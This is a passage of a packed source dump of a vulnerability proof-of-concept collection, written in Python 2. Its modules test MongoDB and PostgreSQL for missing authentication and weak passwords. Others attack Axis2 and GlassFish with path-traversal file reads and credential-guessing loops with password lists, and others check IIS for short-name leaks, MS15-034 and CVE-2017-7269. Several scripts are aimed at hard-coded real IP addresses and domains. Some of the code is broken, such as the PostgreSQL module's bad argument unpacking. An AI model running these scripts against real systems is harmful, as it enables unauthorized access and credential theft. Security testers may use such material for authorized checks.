46 | pass 47 | except pexpect.TIMEOUT: 48 | pass 49 | finally: 50 | if cmd is not None: 51 | cmd.close() 52 | return result 53 | if __name__ == '__main__': 54 | print P().verify(ip='222.177.55.119',port='2601') 55 | -------------------------------------------------------------------------------- /database/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/database/__init__.py -------------------------------------------------------------------------------- /database/mongo/__init__.py: 
-------------------------------------------------------------------------------- 1 | KEYWORDS = ['mongo', ] 2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 3 | 4 | 5 | if '27017' in port : 6 | return True 7 | else: 8 | 9 | return False -------------------------------------------------------------------------------- /database/mongo/mongo_auth.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | from t import T 4 | from pymongo import MongoClient 5 | import requests,urllib2,json,urlparse 6 | class P(T): 7 | def __init__(self): 8 | T.__init__(self) 9 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 10 | 11 | result = {} 12 | result['result']=False 13 | r=None 14 | try: 15 | 16 | r = MongoClient(ip, 27017, connectTimeoutMS=1000, socketTimeoutMS=1000, waitQueueTimeoutMS=1000) 17 | 18 | 19 | serverInfo = r.server_info() 20 | 21 | dbList = r.database_names() 22 | 23 | 24 | 25 | result['result']=True 26 | result['VerifyInfo'] = {} 27 | result['VerifyInfo']['type']='MongoClient unauth' 28 | result['VerifyInfo']['URL'] =ip+':'+port 29 | result['VerifyInfo']['payload']='None' 30 | result['VerifyInfo']['result'] ='MongoClient unauth' 31 | 32 | except Exception,e: 33 | print e.text 34 | finally: 35 | if r is not None: 36 | r.close() 37 | del r 38 | return result 39 | if __name__ == '__main__': 40 | print P().verify(ip='140.114.108.4',port='80') -------------------------------------------------------------------------------- /database/mongo/t.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | 4 | 5 | class T(object): 6 | def __init__(self): 7 | 8 | self.result = { 9 | 'type': None, 10 | 'version': None, 11 | } 12 | self.keywords = [] 13 | self.versions = [] 14 | 15 | def 
match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw): 16 | ## 17 | #head 返回的请求头 18 | #context 返回请求正文html代码 19 | #ip 请求ip 20 | #port 请求端口 21 | #productname 请求的组件产品 22 | #keywords 暂时已知的关键词组件 23 | #hackinfo 备用字段 24 | 25 | 26 | 27 | 28 | return True 29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 30 | result = {} 31 | result['result']=False 32 | return result 33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 34 | result = {} 35 | result['result']=False 36 | return result 37 | def parse_output(self, result): 38 | result = {} 39 | result['result']=False 40 | return result -------------------------------------------------------------------------------- /database/postgresql/__init__.py: -------------------------------------------------------------------------------- 1 | KEYWORDS = ['postgresql', ] 2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 3 | 4 | 5 | if 'postgresql' in context or 'postgresql' in head: 6 | return True 7 | else: 8 | return False -------------------------------------------------------------------------------- /database/postgresql/postgresql_3c99590b8794b5c7ed0693e732916e92.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #__Author__ = DWBH 4 | # __type__ = postgresSQL md5加密方式弱口令检测 5 | 6 | import urlparse 7 | import socket 8 | import re 9 | import hashlib 10 | import struct 11 | from ..miniCurl import Curl 12 | from ..t import T 13 | 14 | 15 | def getauth(s,username,password): 16 | typeu="\x00\x03\x00\x00" 17 | user="\x75\x73\x65\x72\x00" 18 | uservalue=username+"\x00" 19 | db="\x64\x61\x74\x61\x62\x61\x73\x65\x00" 20 | dbvalue="\x00" 21 | app="\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x5F\x6E\x61\x6D\x65\x00" 22 | appvalue="psql"+"\x00" 23 | 
encode="\x63\x6C\x69\x65\x6E\x74\x5F\x65\x6E\x63\x6F\x64\x69\x6E\x67\x00" 24 | encodevalue="\x47\x42\x4B\x00" 25 | data=typeu+user+uservalue+db+dbvalue+app+appvalue+encode+encodevalue+"\x00" 26 | payload=struct.pack("!i",len(data)+4)+data 27 | try: 28 | s.sendall(payload) 29 | res = s.recv(1024) 30 | authtype = struct.unpack("!i",res[5:9])[0] 31 | if res[0]=="R": 32 | if authtype==0: 33 | return 'noauth',0 34 | if authtype==5: 35 | return "md5",makeauth(username,password,res[-4:]) 36 | else: 37 | return "auth",struct.unpack("!i",res[5:9])[0] 38 | except: 39 | pass 40 | return "baduser",-1 41 | 42 | 43 | 44 | 45 | def md5(data): 46 | return hashlib.md5(data).hexdigest() 47 | 48 | def makeauth(username,password,key): 49 | return 'md5'+md5(md5(password+username)+key) 50 | 51 | 52 | 53 | 54 | def sendauth(s,auth): 55 | authstye="\x70\x00\x00\x00\x28" 56 | auth=authstye+auth+"\x00" 57 | try: 58 | s.sendall(auth) 59 | data=s.recv(1024) 60 | if data[0]=="R" and data[5:9]=="\x00\x00\x00\x00": 61 | return True 62 | except: 63 | pass 64 | return False 65 | 66 | def createsocket(ip,port): 67 | for x in range(10): 68 | try: 69 | s = socket.socket() 70 | s.connect((ip,port)) 71 | return s 72 | except: 73 | pass 74 | 75 | 76 | class P(T): 77 | def __init__(self): 78 | T.__init__(self) 79 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 80 | args='http://'+ip+':'+port+'/' 81 | curl=Curl() 82 | result = {} 83 | result['result']=False 84 | 85 | ip,port=args 86 | baduser = [] 87 | gooduser = [] 88 | try: 89 | s = socket.socket() 90 | s.connect((ip,port)) 91 | pass_list = util.load_password_dict( 92 | ip, 93 | userfile='database/mysql_user.txt', 94 | passfile='database/mysql_pass.txt', 95 | mix=True, 96 | userlist=['postgres:postgres','postgres:root','postgres'], 97 | ) 98 | 99 | for username,password in pass_list: 100 | if username in baduser: 101 | continue 102 | auth=getauth(s,username,password) 103 | if auth[0]=='noauth': 104 | 
output("postgresql://%s:%d" % (ip,port),result,'hole') 105 | return 106 | if auth[0]=="md5": 107 | if sendauth(s,auth[1]): 108 | output("postgresql://%s:%s@%s:%d" % (username,password,ip,port),result,'hole') 109 | s.close() 110 | return 111 | else: 112 | if username not in gooduser: 113 | output("postgresql user: %s@%s:%d authtype:md5" % (username,ip,port),result,'note') 114 | gooduser.append(username) 115 | if auth[0]=='auth': 116 | if username not in gooduser: 117 | output("postgresql user: %s@%s:%d authtype:%d" % (username,ip,port,auth[1]),result,'note') 118 | gooduser.append(username) 119 | if auth[0]=='baduser': 120 | baduser.append(username) 121 | s.close() 122 | s = createsocket(ip,port) 123 | except Exception,e: 124 | pass 125 | s.close() 126 | 127 | 128 | del curl 129 | return result 130 | 131 | 132 | def output(url,result,label): 133 | info = url + ' postgresql Vul ' 134 | result['result']=True 135 | result['VerifyInfo'] = {} 136 | result['VerifyInfo']['type']='postgresql Vul' 137 | result['VerifyInfo']['URL'] =url 138 | result['VerifyInfo']['payload']='/root/github/poccreate/thirdparty/postgresql/postgresql_3c99590b8794b5c7ed0693e732916e92.py' 139 | result['VerifyInfo']['level']=label 140 | result['VerifyInfo']['result'] =info 141 | 142 | if __name__ == '__main__': 143 | print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80') 144 | 145 | 146 | 147 | #/root/github/poccreate/thirdparty/postgresql/postgresql_3c99590b8794b5c7ed0693e732916e92.py 148 | #/root/github/poccreate/codesrc/exp-788.py -------------------------------------------------------------------------------- /database/t.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | 4 | 5 | class T(object): 6 | def __init__(self): 7 | 8 | self.result = { 9 | 'type': None, 10 | 'version': None, 11 | } 12 | self.keywords = [] 13 | self.versions = [] 14 | 15 | def 
match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw): 16 | ## 17 | #head 返回的请求头 18 | #context 返回请求正文html代码 19 | #ip 请求ip 20 | #port 请求端口 21 | #productname 请求的组件产品 22 | #keywords 暂时已知的关键词组件 23 | #hackinfo 备用字段 24 | 25 | 26 | 27 | 28 | return True 29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 30 | result = {} 31 | result['result']=False 32 | return result 33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 34 | result = {} 35 | result['result']=False 36 | return result 37 | def parse_output(self, result): 38 | result = {} 39 | result['result']=False 40 | return result -------------------------------------------------------------------------------- /middileware/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/__init__.py -------------------------------------------------------------------------------- /middileware/apache/__init__.py: -------------------------------------------------------------------------------- 1 | KEYWORDS = ['apache', ] 2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 3 | return False -------------------------------------------------------------------------------- /middileware/apache/apache_state.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | import urllib2 3 | 4 | 5 | from t import T 6 | 7 | 8 | 9 | 10 | class P(T): 11 | def __init__(self): 12 | T.__init__(self) 13 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 14 | timeout=3 15 | target_url='' 16 | if port=='443': 17 | target_url = 'https://'+ip+':'+port 18 | else: 19 | 20 | target_url = 'http://'+ip+':'+port 21 | result = {} 22 | res=None 23 | result['result']=False 24 | 
vul_url = target_url + "/server-status" 25 | try: 26 | res=urllib2.urlopen(vul_url,timeout=timeout) 27 | res_html = res.read() 28 | except: 29 | return result 30 | finally: 31 | if res is not None: 32 | res.close() 33 | del res 34 | if "Server Built" in res_html: 35 | info = vul_url + " apache status Vul" 36 | result['result']=True 37 | result['VerifyInfo'] = {} 38 | result['VerifyInfo']['type']='apache status Vul' 39 | result['VerifyInfo']['URL'] =target_url 40 | result['VerifyInfo']['payload']=vul_url 41 | result['VerifyInfo']['result'] =info 42 | return result 43 | return result 44 | 45 | 46 | 47 | 48 | 49 | 50 | if __name__ == '__main__': 51 | print P().verify(ip='www.apache.org',port='80') -------------------------------------------------------------------------------- /middileware/apache/t.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | 4 | 5 | class T(object): 6 | def __init__(self): 7 | 8 | self.result = { 9 | 'type': None, 10 | 'version': None, 11 | } 12 | self.keywords = [] 13 | self.versions = [] 14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw): 15 | ## 16 | #head 返回的请求头 17 | #context 返回请求正文html代码 18 | #ip 请求ip 19 | #port 请求端口 20 | #productname 请求的组件产品 21 | #keywords 暂时已知的关键词组件 22 | #hackinfo 备用字段 23 | 24 | 25 | 26 | 27 | return True 28 | 29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 30 | result = {} 31 | result['result']=False 32 | return result 33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 34 | result = {} 35 | result['result']=False 36 | return result 37 | def parse_output(self, result): 38 | result = {} 39 | result['result']=False 40 | return result -------------------------------------------------------------------------------- /middileware/axis/__init__.py: 
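# --------------------------------------------------------------------------
# /middileware/axis/__init__.py
# --------------------------------------------------------------------------
KEYWORDS = ['axis', ]


def rules(head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''):
    """Fingerprint Apache Axis2 from the probe response body.

    True when the body references the Axis2 web-UI logo. The other
    parameters exist for interface parity with the other ``rules`` hooks
    and are unused; ``productname={}`` is kept for compatibility and is
    never mutated.
    """
    return 'axis2-web/images/axis_l.jpg' in context


# --------------------------------------------------------------------------
# /middileware/axis/axis_config_read.py
# --------------------------------------------------------------------------
#!/usr/bin/env python
# encoding: utf-8
from ..t import T
import re
import urllib2, requests, urllib2, json, urlparse


class P(T):
    """Axis2 ``?xsd=`` path traversal: read ``conf/axis2.xml`` through a deployed service."""

    def __init__(self):
        T.__init__(self)

    def verify(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''):
        """Pick one service from ``listServices``, then fetch ``../conf/axis2.xml`` via ``?xsd=``.

        Returns the framework result dict. ``result['result']`` is True when
        the fetched document contains ``axisconfig``; the admin credentials
        found in it are appended to ``VerifyInfo['result']`` when present.
        Network errors are printed and yield a negative result.
        """
        timeout = 3
        target_url = 'http://' + ip + ':' + port
        payload = target_url + '/axis2/services/listServices'
        result = {'result': False}
        r = None
        res = None
        try:
            r = requests.get(url=payload, timeout=timeout)
            if r.status_code != 404:
                # First deployed service name on the listServices page.
                m = re.search(r'\/axis2\/services\/(.*?)\?wsdl">.*?<\/a>', r.text)
                # BUG FIX: ``m`` is None when no service is listed; the original
                # dereferenced it unconditionally and raised AttributeError.
                if m is not None and m.group(1):
                    server_str = m.group(1)
                    read_url = target_url + '/axis2/services/%s?xsd=../conf/axis2.xml' % (server_str)
                    res = requests.get(read_url, timeout=timeout)
                    # BUG FIX: requests.Response has no .read(); the original
                    # raised AttributeError before it could ever report a hit.
                    res_html = res.text
                    if 'axisconfig' in res_html:
                        # The file read alone is the finding; credentials are a bonus.
                        info = '%s Local File Inclusion Vulnerability' % (read_url)
                        try:
                            # NOTE(review): the listing had lost the opening tag of
                            # both patterns (each read just '(.*?)</parameter>').
                            # axis2.xml keeps the admin login in the userName /
                            # password parameters -- the same field names that
                            # axis_crackpass.py posts -- so those tags are used
                            # here; confirm against the upstream copy.
                            user = re.search(r'<parameter name="userName">(.*?)<\/parameter>', res_html)
                            password = re.search(r'<parameter name="password">(.*?)<\/parameter>', res_html)
                            info = '%s Local File Inclusion Vulnerability %s:%s' % (read_url, user.group(1), password.group(1))
                        except Exception:
                            pass
                        result['result'] = True
                        result['VerifyInfo'] = {}
                        result['VerifyInfo']['type'] = 'Local File Inclusion Vulnerability'
                        result['VerifyInfo']['URL'] = target_url
                        result['VerifyInfo']['payload'] = payload
                        result['VerifyInfo']['result'] = info
        except Exception, e:
            # BUG FIX: exceptions carry no .text; the original handler itself raised.
            print e
        finally:
            if r is not None:
                r.close()
            if res is not None:
                res.close()
        return result


if __name__ == '__main__':
    print P().verify(ip='222.29.81.19', port='8080')


# --------------------------------------------------------------------------
# /middileware/axis/axis_crackpass.py
# --------------------------------------------------------------------------
#!/usr/bin/env python
#coding:utf-8
from t import T
import urllib2


class P(T):
    """Axis2 admin console (``/axis2/axis2-admin/login``) default / weak credentials."""

    def __init__(self):
        T.__init__(self)

    def verify(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''):
        """Post a short user/password list to the Axis2 admin login form.

        A hit is recognised by admin-page markers (``flag_list``) in the
        response body. Any HTTPError ends the run; three URLErrors
        (connection problems) end it as well. Returns the framework result
        dict.
        """
        timeout = 3
        target_url = 'http://' + ip + ':' + port
        login_url = target_url + '/axis2/axis2-admin/login'
        result = {'result': False}
        error_i = 0
        flag_list = ['Administration Page', 'System Components', '"axis2-admin/upload"', 'include page="footer.inc">', 'axis2-admin/logout']
        user_list = ['axis', 'admin', 'manager', 'root']
        pass_list = ['', 'axis', 'axis2', '123456', '12345678', 'password', '123456789', 'admin123', 'admin888', 'admin1', 'administrator', '8888888', '123123', 'admin', 'manager', 'root']
        for user in user_list:
            for password in pass_list:
                res = None
                res_html = ''
                try:
                    PostStr = 'userName=%s&password=%s&submit=+Login+' % (user, password)
                    request = urllib2.Request(login_url, PostStr)
                    res = urllib2.urlopen(request, timeout=timeout)
                    res_html = res.read()
                except urllib2.HTTPError, e:
                    print e
                    return result
                except urllib2.URLError, e:
                    print e
                    error_i += 1
                    if error_i >= 3:
                        return result
                    continue
                except Exception:
                    return result
                finally:
                    # BUG FIX: the original did ``del res`` here, so on the next
                    # iteration a failed urlopen() left ``res`` unbound and this
                    # very ``finally`` raised UnboundLocalError out of verify().
                    if res is not None:
                        res.close()
                for flag in flag_list:
                    if flag in res_html:
                        info = '%s Axis Weak password %s:%s' % (login_url, user, password)
                        result['result'] = True
                        result['VerifyInfo'] = {}
                        result['VerifyInfo']['type'] = 'Axis Weak password'
                        result['VerifyInfo']['URL'] = target_url
                        result['VerifyInfo']['payload'] = login_url
                        result['VerifyInfo']['result'] = info
                        return result
        return result


if __name__ == '__main__':
    print P().verify(ip='222.29.81.19', port='8080')


# --------------------------------------------------------------------------
# /middileware/axis/axis_info.py
# --------------------------------------------------------------------------
#coding:utf-8
from t import T
import urllib2


class P(T):
    """Axis2 ``HappyAxis.jsp`` diagnostics page reachable without authentication."""

    def __init__(self):
        T.__init__(self)

    def verify(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''):
        """Fetch ``/axis2/axis2-web/HappyAxis.jsp`` and look for its title marker.

        Returns the framework result dict; any network error yields a
        negative result.
        """
        timeout = 3
        target_url = 'http://' + ip + ':' + port
        vul_url = target_url + "/axis2/axis2-web/HappyAxis.jsp"
        result = {'result': False}
        response = None
        try:
            response = urllib2.urlopen(vul_url, timeout=timeout)
            res_html = response.read()
        except Exception:
            return result
        finally:
            if response is not None:
                response.close()
        if "Axis2 Happiness Page" in res_html:
            info = vul_url + " Axis Information Disclosure"
            result['result'] = True
            result['VerifyInfo'] = {}
            result['VerifyInfo']['type'] = 'Axis Information Disclosure'
            result['VerifyInfo']['URL'] = target_url
            result['VerifyInfo']['payload'] = vul_url
            result['VerifyInfo']['result'] = info
        return result


if __name__ == '__main__':
    print P().verify(ip='222.29.81.19', port='8080')


# --------------------------------------------------------------------------
# /middileware/axis/t.py
# --------------------------------------------------------------------------
#!/usr/bin/env python
# encoding: utf-8


class T(object):
    """Base class for every PoC module; the framework calls the hooks below."""

    def __init__(self):
        self.result = {
            'type': None,
            'version': None,
        }
        self.keywords = []
        self.versions = []

    def match_rule(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo='', **kw):
        """Decide whether this PoC applies to the target; the base always says yes.

        head        -- response headers of the probe request
        context     -- response body (HTML) of the probe request
        ip / port   -- target address
        productname -- component / product identified for the target
        keywords    -- component keywords known so far
        hackinfo    -- spare field
        """
        return True

    def verify(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''):
        """Non-intrusive check hook; the base reports nothing found."""
        return {'result': False}

    def attack(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''):
        """Exploitation hook; the base reports nothing found."""
        return {'result': False}

    def parse_output(self, result):
        """Post-processing hook; the base ignores ``result`` and reports nothing found."""
        return {'result': False}


# --------------------------------------------------------------------------
# /middileware/glassfish/__init__.py
# --------------------------------------------------------------------------
KEYWORDS = ['glassfish', ]


def rules(head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''):
    """Fingerprint GlassFish from the probe response body.

    BUG FIX: the original tested the single substring
    ``'resource/js/cj.js|glassfish.dev.java.net'`` -- a regex-style
    alternation used as a plain string, which no real page contains, so the
    rule never fired. Either marker on its own now matches.
    """
    return 'resource/js/cj.js' in context or 'glassfish.dev.java.net' in context


# --------------------------------------------------------------------------
# /middileware/glassfish/glassfish_crackpass.py
# --------------------------------------------------------------------------
#coding:utf-8
from t import T
import urllib2


class P(T):
    """GlassFish admin console (``/common/j_security_check``) weak credentials."""

    def __init__(self):
        T.__init__(self)

    def verify(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''):
        """Post a short password list for ``admin`` to the admin-console login.

        A hit is recognised by console markers (``flag_list``) in the body.
        Any HTTPError ends the run; three URLErrors end it as well. Returns
        the framework result dict. (The original echoed every credential
        guess to stdout; that debug print is gone.)
        """
        timeout = 3
        target_url = 'http://' + ip + ':' + port
        login_url = target_url + '/common/j_security_check'
        result = {'result': False}
        error_i = 0
        flag_list = ['Just refresh the page... login will take over', 'GlassFish Console - Common Tasks', '/resource/common/js/adminjsf.js">', 'Admin Console', 'src="/homePage.jsf"', 'src="/header.jsf"', 'Common Tasks', 'title="Logout from GlassFish']
        user_list = ['admin']
        pass_list = ['adminadmin', 'admin', 'glassfish', 'password', '123456', '12345678', '123456789', 'admin123', 'admin888', 'admin1', 'administrator', '8888888', '123123', 'manager', 'root']
        for user in user_list:
            for password in pass_list:
                res = None
                res_html = ''
                try:
                    PostStr = 'j_username=%s&j_password=%s&loginButton=Login&loginButton.DisabledHiddenField=true' % (user, password)
                    request = urllib2.Request(login_url, PostStr)
                    res = urllib2.urlopen(request, timeout=timeout)
                    res_html = res.read()
                except urllib2.HTTPError, e:
                    return result
                except urllib2.URLError, e:
                    error_i += 1
                    if error_i >= 3:
                        return result
                    continue
                except Exception:
                    break
                finally:
                    # BUG FIX: ``del res`` here broke the next iteration's
                    # ``finally`` (UnboundLocalError) whenever urlopen failed.
                    if res is not None:
                        res.close()
                for flag in flag_list:
                    if flag in res_html:
                        info = '%s/common GlassFish Weak password %s:%s' % (target_url, user, password)
                        result['result'] = True
                        result['VerifyInfo'] = {}
                        result['VerifyInfo']['type'] = 'GlassFish Weak password'
                        result['VerifyInfo']['URL'] = target_url
                        result['VerifyInfo']['payload'] = target_url + '/common/j_security_check'
                        result['VerifyInfo']['result'] = info
                        return result
        return result


if __name__ == '__main__':
    print P().verify(ip='1.202.164.105', port='8080')


# --------------------------------------------------------------------------
# /middileware/glassfish/glassfish_fileread.py
# --------------------------------------------------------------------------
#coding:utf-8
from t import T
import urllib2


class P(T):
    """GlassFish path traversal via overlong UTF-8 ``..`` (``%c0%ae%c0%ae``) under ``/theme/``."""

    def __init__(self):
        T.__init__(self)

    def verify(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''):
        """Request the traversal URL and look for ``package-appclient.xml`` in the listing.

        ``%c0%ae`` is an overlong encoding of ``.`` that the decoder accepts
        while the path normaliser does not see it as ``..``. Returns the
        framework result dict; any network error yields a negative result.
        """
        timeout = 3
        target_url = 'http://' + ip + ':' + port
        vul_url = target_url + "/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/"
        result = {'result': False}
        res = None
        try:
            res = urllib2.urlopen(vul_url, timeout=timeout)
            res_html = res.read()
        except Exception, e:
            return result
        finally:
            if res is not None:
                res.close()
        if "package-appclient.xml" in res_html:
            info = vul_url + "GlassFish File Read Vul"
            result['result'] = True
            result['VerifyInfo'] = {}
            result['VerifyInfo']['type'] = 'GlassFish File Read Vulnerability'
            result['VerifyInfo']['URL'] = target_url
            result['VerifyInfo']['payload'] = vul_url
            result['VerifyInfo']['result'] = info
        return result


if __name__ == '__main__':
    print P().verify(ip='1.202.164.105', port='8080')


# --------------------------------------------------------------------------
# /middileware/glassfish/t.py
# --------------------------------------------------------------------------
#!/usr/bin/env python
# encoding: utf-8


class T(object):
    """Base class for every PoC module; the framework calls the hooks below."""

    def __init__(self):
        self.result = {
            'type': None,
            'version': None,
        }
        self.keywords = []
        self.versions = []

    def match_rule(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo='', **kw):
        """Decide whether this PoC applies to the target; the base always says yes.

        head        -- response headers of the probe request
        context     -- response body (HTML) of the probe request
        ip / port   -- target address
        productname -- component / product identified for the target
        keywords    -- component keywords known so far
        hackinfo    -- spare field
        """
        return True

    def verify(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''):
        """Non-intrusive check hook; the base reports nothing found."""
        return {'result': False}

    def attack(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''):
        """Exploitation hook; the base reports nothing found."""
        return {'result': False}

    def parse_output(self, result):
        """Post-processing hook; the base ignores ``result`` and reports nothing found."""
        return {'result': False}


# --------------------------------------------------------------------------
# /middileware/iis/__init__.py
# --------------------------------------------------------------------------
KEYWORDS = ['iis', ]


def rules(head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''):
    """Fingerprint IIS from the ``Server`` header or the identified product name."""
    return 'Microsoft-IIS' in head or 'Microsoft IIS httpd' in productname.get('productname', '')


# --------------------------------------------------------------------------
# /middileware/iis/iis6.0_cve-2017-7269.py
# --------------------------------------------------------------------------
#!/usr/bin/env python
# encoding: utf-8
from t import T
import re
import urllib2, requests, urllib2, json, urlparse
requests.packages.urllib3.disable_warnings()

import subprocess


class P(T):
    """IIS 6.0 WebDAV (CVE-2017-7269) exposure check.

    Indicator only: one PROPFIND is sent and the ``411 Length Required``
    answer of an enabled WebDAV module is looked for. No overflow payload is
    sent, so exploitability (patch level) is not proven -- treat a hit as
    "IIS 6.0 with WebDAV on", not as confirmed RCE.
    """

    def __init__(self):
        T.__init__(self)

    def verify(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''):
        """Run ``curl -I -X PROPFIND`` against the site root and inspect the headers.

        curl is invoked with an argv list (no shell), so ``ip``/``port``
        cannot inject; the URL scheme prefix also prevents them from being
        read as curl options. Returns the framework result dict.
        """
        if int(port) == 443:
            protocal = "https"
        else:
            protocal = "http"
        target_url = protocal + "://" + ip + ":" + port + '/'
        result = {'result': False}
        try:
            myout = subprocess.check_output(['curl', '--connect-timeout', '2', '--max-time', '2', '-s', '-I', '-X', 'PROPFIND', target_url])
            # A 411 on PROPFIND only says WebDAV is enabled; CVE-2017-7269 is
            # specific to IIS 6.0, so the banner is required as well to avoid
            # flagging every WebDAV-enabled IIS (a masked banner now means a miss).
            if "HTTP/1.1 411 Length Required" in myout and "Microsoft-IIS/6.0" in myout:
                result['result'] = True
                result['VerifyInfo'] = {}
                result['VerifyInfo']['type'] = 'command execute Vulnerability'
                result['VerifyInfo']['URL'] = target_url
                result['VerifyInfo']['payload'] = 'iis_cve-2017-7269 Vulnerability'
                result['VerifyInfo']['level'] = 'hole'
                # BUG FIX: the original stored ``r.content`` with ``r`` never
                # defined, so every hit raised NameError (and the handler then
                # raised again on ``e.text``).
                result['VerifyInfo']['result'] = myout
        except Exception, e:
            print e
        return result


if __name__ == '__main__':
    print P().verify(ip='122.224.58.215', port='80')


# --------------------------------------------------------------------------
# /middileware/iis/iis_shortname.py
# --------------------------------------------------------------------------
#!/usr/bin/env python
# encoding: utf-8
from t import T
import re
import urllib2, requests, urllib2, json, urlparse
requests.packages.urllib3.disable_warnings()


class P(T):
    """IIS 8.3 short-name (tilde) enumeration check.

    Two-request differential: ``/*~1****/a.aspx`` (a wildcard that can match
    a short name) is compared with ``/l1j1e*~1****/a.aspx`` (one that
    cannot). A 404 for the first and a 400 for the second is the vulnerable
    signature.
    """

    def __init__(self):
        T.__init__(self)

    def verify(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''):
        """Send both probe requests (no redirects) and compare status codes.

        Returns the framework result dict; errors are printed and yield a
        negative result.
        """
        timeout = 5
        if int(port) == 443:
            protocal = "https"
        else:
            protocal = "http"
        target_url = protocal + "://" + ip + ":" + port
        result = {'result': False}
        r = None
        s = None
        try:
            r = requests.get(url=target_url + '/*~1****/a.aspx', timeout=timeout, allow_redirects=False)
            s = requests.get(url=target_url + '/l1j1e*~1****/a.aspx', timeout=timeout, allow_redirects=False)
            if r.status_code == 404 and s.status_code == 400:
                result['result'] = True
                result['VerifyInfo'] = {}
                result['VerifyInfo']['type'] = 'iis short name Vulnerability'
                result['VerifyInfo']['URL'] = target_url
                result['VerifyInfo']['payload'] = 'null'
                result['VerifyInfo']['level'] = 'warning'
                result['VerifyInfo']['result'] = r.content
        except Exception, e:
            # BUG FIX: exceptions have no .text; the original handler raised itself.
            print e
        finally:
            closeitem(r)
            closeitem(s)
        return result


def closeitem(instance):
    """Close a ``requests.Response`` if one was obtained; ``None`` is a no-op."""
    if instance is not None:
        instance.close()


if __name__ == '__main__':
    print P().verify(ip='cos.99.com', port='80')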
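# --------------------------------------------------------------------------
# /middileware/iis/ms15_034.py
# --------------------------------------------------------------------------
#!/usr/bin/env python
# encoding: utf-8
from t import T
import re
import urllib2, requests, urllib2, json, urlparse


class P(T):
    """MS15-034 check: an out-of-range ``Range`` header answered with 416."""

    def __init__(self):
        T.__init__(self)

    def verify(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''):
        """Send ``Range: bytes=0-18446744073709551615`` and look for a 416 body.

        The detection key is the "Requested Range Not Satisfiable" text (or
        its Chinese IIS equivalent) in the response body; checking
        ``r.status_code == 416`` as well would make it stricter. Returns the
        framework result dict; errors are printed and yield a negative result.
        """
        timeout = 3
        if int(port) == 443:
            protocal = "https"
        else:
            protocal = "http"
        target_url = protocal + "://" + ip + ":" + str(port)
        result = {'result': False}
        r = None
        # 2**64-1 as the upper bound is the MS15-034 trigger value.
        vuln_header = {"Range": "bytes=0-18446744073709551615"}
        try:
            r = requests.get(url=target_url, headers=vuln_header, timeout=timeout, verify=False, allow_redirects=False)
            if "请求范围不符合" in r.content or "Requested Range Not Satisfiable" in r.content:
                result['result'] = True
                result['VerifyInfo'] = {}
                result['VerifyInfo']['type'] = 'iis Vulnerability'
                result['VerifyInfo']['URL'] = target_url
                # BUG FIX: the original stored an undefined ``vuln_buffer`` here,
                # raising NameError on every positive hit.
                result['VerifyInfo']['payload'] = vuln_header
                result['VerifyInfo']['result'] = r.content
        except Exception, e:
            # BUG FIX: exceptions have no .text; the original handler raised itself.
            print e
        finally:
            if r is not None:
                r.close()
        return result


if __name__ == '__main__':
    print P().verify(ip='202.85.212.101', port='443')


# --------------------------------------------------------------------------
# /middileware/iis/t.py
# --------------------------------------------------------------------------
#!/usr/bin/env python
# encoding: utf-8


class T(object):
    """Base class for every PoC module; the framework calls the hooks below."""

    def __init__(self):
        self.result = {
            'type': None,
            'version': None,
        }
        self.keywords = []
        self.versions = []

    def match_rule(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo='', **kw):
        """Decide whether this PoC applies to the target; the base always says yes.

        head        -- response headers of the probe request
        context     -- response body (HTML) of the probe request
        ip / port   -- target address
        productname -- component / product identified for the target
        keywords    -- component keywords known so far
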